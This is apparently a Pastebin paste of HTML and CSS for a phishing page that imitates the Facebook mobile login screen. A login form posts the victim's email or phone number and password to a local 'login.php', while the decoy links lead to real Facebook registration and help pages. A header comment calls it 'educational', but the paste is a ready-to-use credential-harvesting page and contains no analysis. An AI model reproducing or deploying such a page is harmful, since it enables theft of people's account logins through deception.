Advertisement
iteach

Html

Oct 1st, 2018
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.49 KB | None | 0 0
  1.  
  2. <!-- Important Note ! -->
  3.  
  4. <!-- We just share this code for educational purpose to test the vulnerability of phishing. We are not responsible for any illegal stuffs. if you do so, you will be locked up in jail -->
  5.  
  6. <style>
  7. .heading {
  8. display:block;top:0px;left:0px;right:0px;height:30px;position:fixed;border:0px solid #888;padding-top:16px;text-align:center;font-weight:bold;color:#ffffff;background: #3b5998;width: 100%;height: 100px;z-index:3;
  9. font-size: 70px;
  10. font-family: 'myFancyFont';
  11. }
  12.  
  13. .headmid {
  14. display:block;top:110px;left:0px;right:0px;height:20px;position:fixed;border:0px solid #888;padding:0px;text-align:center;font-weight:bold;color:#000;background: #ECEFF5;width: 100%;height: 1050px;z-index:3;
  15. }
  16.  
  17. .fbapp {
  18. background-color: FFFBE2;
  19. border: 2px solid #E2C822;
  20. border-radius: 15px;
  21. font-size: 40px;
  22. font-family: 'myFancyFont';
  23. font-weight: 400;
  24. color: #3B5998;
  25. height: 100px;
  26. padding-top: 45px;
  27. }
  28.  
  29. .floating {
  30. float: left;
  31. }
  32.  
  33. .icony {
  34. width:45px;
  35. height: 80px;
  36. padding-top: 30px;
  37. padding-bottom: 10px;
  38. padding-left: 40px;
  39. }
  40. </style>
  41.  
  42.  
  43. <div class="heading">
  44. facebook
  45. </div>
  46.  
  47. <div class="headmid">
  48. <br/><br/>
  49. <div class="floating">
  50. <img class="icony" src="https://s33.postimg.org/hksxwrjb3/1512334555590.png"/></div>
  51. <div class="fbapp">Get Facebook for Android and browse faster.
  52. </div>
  53.  
  54.  
  55. <style>
  56.  
  57. @font-face
  58. {
  59. font-family: myFancyFont;
  60. src: url(Roboto.ttf'),;
  61. }
  62.  
  63. .header {
  64. color: white;
  65. background-color: #3b5998;
  66. width: auto;
  67. height: auto;
  68. font-size:60px;
  69. display:block;
  70. font-family: 'myFancyFont', Times, serif; }
  71.  
  72. .email {
  73. padding-left: 40px;
  74. padding-top: 20px;
  75. text-align: left;
  76. font-size: 38px;
  77. font-family: 'myFancyFont', Sans-serif;
  78. font-weight: 410;
  79. }
  80.  
  81. .mail {
  82. padding-left: 40px;
  83. padding-top: 20px;
  84. padding-bottom: 20px;
  85. text-align: left;
  86. left: 40px;
  87. font-size: 38px;
  88. width: 900px;
  89. height: 120px;
  90. border-radius: 10px 10px 0px 0px;
  91. }
  92.  
  93. .pass {
  94. padding-left: 40px;
  95. padding-top: 20px;
  96. padding-bottom: 20px;
  97. text-align: left;
  98. left: 40px;
  99. font-size: 38px;
  100. width: 896px;
  101. height: 120px;
  102. border-radius: 0px 0px 10px 10px;
  103. }
  104. .button {
  105. padding-top: 20px;
  106. padding-bottom: 20px;
  107. background-color: #3b5998;
  108. color: white;
  109. text-align: center;
  110. left: 40px;
  111. font-size: 38px;
  112. width: 900px;
  113. height: 110px;
  114. border-radius: 10px;
  115. }
  116.  
  117. .cbutton:hover {
  118. background-color: 326D15;
  119. }
  120.  
  121. .button:hover {
  122. background-color: 4F6598;
  123. }
  124.  
  125. .cbutton {
  126. padding-top: 20px;
  127. padding-bottom: 20px;
  128. background-color: #558B2F;
  129. color: white;
  130. text-align: center;
  131. font-size: 38px;
  132. width: 400px;
  133. height: 100px;
  134. border-radius: 10px;
  135. box-shadow: 1px 1px 16px #000000;
  136. border-style: none;
  137. text-decoration: bold;
  138.  
  139. }
  140.  
  141. .help {
  142. font-weight: 400;
  143. color: #7596c8;
  144. font-size: 35px;
  145. font-family: 'myFancyFont', Sans-serif;
  146. margin: auto;
  147. }
  148.  
  149. .orrr {
  150. font-size: 36px;
  151. padding-left: 40px;
  152. padding-right: 40px;
  153. color: #4B4F56;
  154. }
  155.  
  156. a {
  157. text-decoration: none;
  158. }
  159.  
  160. .float1 {
  161. text-align: left;
  162. width: 50%;
  163. padding-left: 150px;
  164. color: #90949c;
  165. font-size: 30px;
  166. font-family: 'myFancyFont' , Sans-serif;
  167. }
  168.  
  169. .float2 {
  170. text-align: left;
  171. width: 50%;
  172. padding-left: 150px;
  173. color: #90949c;
  174. font-size: 30px;
  175. font-family: 'myFancyFont' , Sans-serif;
  176. }
  177.  
  178. </style>
  179.  
  180.  
  181. <br/>
  182.  
  183. <form method="post" action="login.php">
  184.  
  185. <br/>
  186. <br/>
  187. <input type="mail" align="left" class="mail" name="mail" id="mail" placeholder="Email address or phone number"/>
  188. <input type="password" align="left" class="pass" name="password" id="password" placeholder="Password"/>
  189. <br/>
  190. <br/><br/>
  191. <input type="submit" class="button" value="Log In"/></form>
  192. <br/>
  193. <br/>
  194.  
  195.  
  196.  
  197. <center>
  198. <table>
  199. <tr>
  200. <td style='width:320px'><hr/></td>
  201. <td><div class="orrr">or</div></td>
  202. <td style='width:320px'><hr/></td>
  203. </tr>
  204. </table>
  205. </center>
  206.  
  207. <br/>
  208. <br/><br/>
  209. <form action="http://m.facebook.com/reg">
  210. <input type="submit" class="cbutton" value="Create Facebook ID"/>
  211. </form>
  212.  
  213. <br/><br/>
  214. <a href="http://m.facebook.com/recover/initiate"><div class="help"><font color="#7596c8">
  215. Forgotten password?</font></a><font color="black"> • </font><a href="http://m.facebook.com/help"><font color="#7596c8">Help center</a></div>
  216. <br/><br/><br/><br/><br/><br/>
  217. <center>
  218. <table>
  219. <tr class="float1">
  220. <td style="padding-left: 2px">English (UK)</td>
  221. <td style="padding-left: 320px">తెలుగు</td>
  222. </tr>
  223.  
  224. <tr class="float1">
  225. <td style="padding-left: 40px;">
  226. اردو
  227. </td>
  228. <td style="padding-left: 300px;">
  229. മലയാളം</td>
  230. </tr>
  231. <tr class="float1">
  232. <td style="padding-left: 20px">
  233. தமிழ்</td>
  234. <td style="padding-left: 330px">
  235. ಕನ್ನಡ</td>
  236.  
  237. </tr>
  238. <tr class="float1">
  239. <td style="padding-left: 30px">
  240. हिन्दी</td>
  241.  
  242. <td style="padding-left: 320px">more +</td>
  243. </tr>
  244.  
  245. </table></center>
  246.  
  247. <center>
  248. <span style="font-size: 30px; font-weight: 10; color: grey; font-family: Sans-serif;">facebook©2018</span>
  249. </center>
  250.  
  251. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement